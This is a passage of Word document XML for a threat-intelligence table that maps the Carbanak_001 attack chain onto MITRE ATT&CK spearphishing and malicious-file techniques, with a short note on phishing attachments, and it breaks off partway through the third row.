              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="55983CCD" w14:textId="1006F85C" w:rsidR="00B707D9" w:rsidRPr="00BE336E" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE336E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Carbanak_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4C615937" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="213701BA" w14:textId="2999BE57" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7F79AD84" w14:textId="2DD70508" w:rsidR="00B707D9" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4DA87D87" w14:textId="4282255C" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="53E4891F" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="002D1D50" w14:paraId="5915FCB0" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="580B48EB" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F93F6E" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C033F05" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33957769" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E3EB6E5" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AC123E1" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0812D3C2" w14:textId="2548F3E3" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5552806F" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="002D1D50" w14:paraId="514E9D42" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B8BC806" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C857115" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="265029D7" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C61F6A4" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60B37D53" w14:textId="722D32A4" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F1C9369" w14:textId="2CE8D042" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="053FF41B" w14:textId="2D80A34B" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01847379" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w14:paraId="44F3B9F7" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FF3BE93" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54E2EB49" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20694037" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1566.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00D138A7" w14:textId="30798100" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E922920" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C8C6B37" w14:textId="7A8A5155" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75771AC2" w14:textId="23784F3E" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00DF711F" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42463930" w14:textId="77777777" w:rsidR="00137B83" w:rsidRPr="00137B83" w:rsidRDefault="00137B83" w:rsidP="00137B83">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00137B83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">An analysis of the campaign has revealed that the initial infections were </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B0CB198" w14:textId="77777777" w:rsidR="00137B83" w:rsidRPr="00137B83" w:rsidRDefault="00137B83" w:rsidP="00137B83">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00137B83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">achieved using spear phishing emails that appeared to be legitimate banking </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5105CED0" w14:textId="77777777" w:rsidR="00137B83" w:rsidRPr="00137B83" w:rsidRDefault="00137B83" w:rsidP="00137B83">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00137B83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">communications, with Microsoft Word 97 – 2003 (.doc) and Control Panel Applet </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="754A783D" w14:textId="66DBDD0C" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00137B83" w:rsidP="00137B83">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00137B83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(.CPL) files attached</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="009F49DF" w14:paraId="5E382A0E" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77AB7DAC" w14:textId="1399F2D2" w:rsidR="00B707D9" w:rsidRPr="009F49DF" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09011F95" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="009F49DF" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B25406B" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="009F49DF" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1204.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F24FF92" w14:textId="6FB71750" w:rsidR="00B707D9" w:rsidRPr="009F49DF" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E5BDBC6" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="009F49DF" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7406B3C8" w14:textId="609C9BD9" w:rsidR="00B707D9" w:rsidRPr="009F49DF" w:rsidRDefault="00DF711F" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="396D4E72" w14:textId="6CADEE75" w:rsidR="00B707D9" w:rsidRPr="009F49DF" w:rsidRDefault="00DF711F" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31672D0D" w14:textId="15A21E6E" w:rsidR="00B707D9" w:rsidRPr="009F49DF" w:rsidRDefault="00137B83" w:rsidP="00B707D9">
            <w:r>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w14:paraId="755208B2" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE03E5E" w14:textId="16D0A23E" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41C58D1A" w14:textId="5CECE81B" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
